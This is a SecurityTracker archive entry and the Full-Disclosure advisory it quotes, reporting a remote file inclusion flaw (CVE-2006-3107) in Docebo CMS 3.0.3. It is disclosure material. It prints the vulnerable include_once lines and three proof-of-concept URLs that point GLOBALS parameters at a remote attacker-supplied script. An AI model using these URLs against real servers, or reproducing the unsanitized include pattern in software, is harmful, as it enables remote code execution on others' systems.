SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Forum/Board/Portal)  >   DoceboLMS Vendors:   Docebolms.org
Docebo Include File Flaw in GLOBALS['where_framework'] and GLOBALS['where_cms'] Parameters Let Remote Users Execute Arbitrary Code
SecurityTracker Alert ID:  1016259
SecurityTracker URL:  http://securitytracker.com/id/1016259
CVE Reference:   CVE-2006-3107   (Links to External Site)
Updated:  May 21 2009
Original Entry Date:  Jun 9 2006
Impact:   Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): 3.0.3
Description:   A vulnerability was reported in Docebo. A remote user can include and execute arbitrary code on the target system.

The software does not properly validate user-supplied input in the GLOBALS['where_framework'] and GLOBALS['where_cms'] parameters. If register_globals is enabled, a remote user can supply a specially crafted URL to cause the target system to include and execute arbitrary PHP code from a remote location. The PHP code, including operating system commands, will run with the privileges of the target web service.

Some demonstration exploit URLs are provided:

http://[target]/doceboCms/[dc_path]admin/modules/news/news_class.php?GLOBALS[where_framework]=[cmd_url]
http://[target]/doceboCms/[dc_path]admin/modules/content/content_class.php?GLOBALS[where_framework]=[cmd_url]
http://[target]/doceboCms/[dc_path]admin/modules/block_media/util.media.php?GLOBALS[where_cms]=[cmd_url]

Federico Fazzi discovered this vulnerability.

Impact:   A remote user can execute arbitrary PHP code and operating system commands on the target system with the privileges of the target web service.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.docebolms.org/doceboCms/ (Links to External Site)
Cause:   Input validation error, State error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  [Full-disclosure] Docebo CMS 3.0.3, Remote command execution

-----------------------------------------------------
Advisory id: FSA:007

Author:    Federico Fazzi
Date:	   09/06/2006, 6:10
Sinthesis: Docebo CMS 3.0.3, Remote command execution
Type:	   high
Product:   http://www.docebolms.org/
Patch:	   unavailable
-----------------------------------------------------


1) Description:

Error occured in news_class.php,

include_once($GLOBALS['where_framework']."/lib/lib.listview.php");
include_once($GLOBALS['where_framework']."/lib/lib.treedb.php");
include_once($GLOBALS['where_framework']."/lib/lib.treeview.php");

Error occured in content_class.php,

include_once($GLOBALS['where_framework']."/lib/lib.listview.php");
include_once($GLOBALS['where_framework']."/lib/lib.treedb.php");
include_once($GLOBALS['where_framework']."/lib/lib.treeview.php");

Error occured in util.media.php,

include_once($GLOBALS["where_cms"]."/admin/modules/media/media_class.php");

The users can include a remote file because
the $GLOBALS['where_framework'], $GLOBALS['where_cms']
isn't sanitized

2) Proof of concept:

http://example/doceboCms/[dc_path]admin/modules/news/news_class.php?GLOBALS[where_framework]=[cmd_url]
http://example/doceboCms/[dc_path]admin/modules/content/content_class.php?GLOBALS[where_framework]=[cmd_url]
http://example/doceboCms/[dc_path]admin/modules/block_media/util.media.php?GLOBALS[where_cms]=[cmd_url]

3) Solution:

include file where are declare $GLOBALS[*]

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC